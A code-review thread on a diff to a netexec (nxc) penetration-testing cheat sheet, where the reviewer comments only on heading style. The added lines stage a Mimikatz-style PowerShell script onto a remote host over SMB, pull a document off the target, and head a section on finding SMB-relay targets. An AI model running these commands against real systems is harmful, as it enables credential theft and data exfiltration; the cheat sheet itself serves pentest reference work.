netexec.cheat

```diff
@@ -42,6 +42,19 @@ nxc smb <ip> -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER
 nxc smb <ip> -u '<username>' -p '<password>' -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=.
 
 
+## Use nxc to put or get file or tool remotely
+nxc smb <ip> -u '<username>' -p '<password>' --put-file /workspace/Invoke-Mimi.ps1 \\users\\public\\Invoke-Mimi.ps1
+nxc smb <ip> -u '<username>' -p '<password>' --get-file \\users\\public\\File.docx /workspace/File.docx
+
+
+## Save a list of relays (SMB signing = False)
```

Comment:
If you look at the whole file let's save the `##` for denoting entire sections of new/related commands (if this makes sense). You'll see me using that format throughout all the cheat sheets (or maybe at least this netexec one since it's newer).

```suggestion
# Save a list of relays (SMB signing = False)
```